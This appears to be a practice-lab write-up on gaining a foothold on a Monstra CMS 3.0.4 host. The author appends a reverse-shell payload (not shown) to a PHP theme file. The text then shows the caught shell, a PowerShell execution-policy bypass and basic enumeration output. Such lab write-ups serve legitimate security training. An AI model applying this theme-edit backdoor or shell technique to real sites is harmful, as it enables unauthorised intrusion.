Monstra Theme Edit


The target Monstra instance has so many vulnerabilities due to its outdated version; 3.0.4 However, exploiting those vulnerabilities seem rather challenging as most exploits leverage the file upload feature, which doesn’t appear to be functioning as it should. Thus, I will be opting out to another vector to gain the initial foothold.

Most CMS supports “themes”, and they can be edited if administrative access is granted.

Monstra is no exception.

I will go with this one

Appending the payload at the bottom Save and Exit

Invoking the payload by navigating to the blog; /blog/blog

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.156.180] 49801
SOCKET: Shell has connected! PID: 4832
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs\blog> powershell -ep bypass -nop 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\xampp\htdocs\blog> whoami
mike-pc\mike
PS C:\xampp\htdocs\blog> hostname
Mike-PC
PS C:\xampp\htdocs\blog> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.156.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.156.254

Initial Foothold established to the target system as the mike user via editing a PHP theme file of the target Monstra instance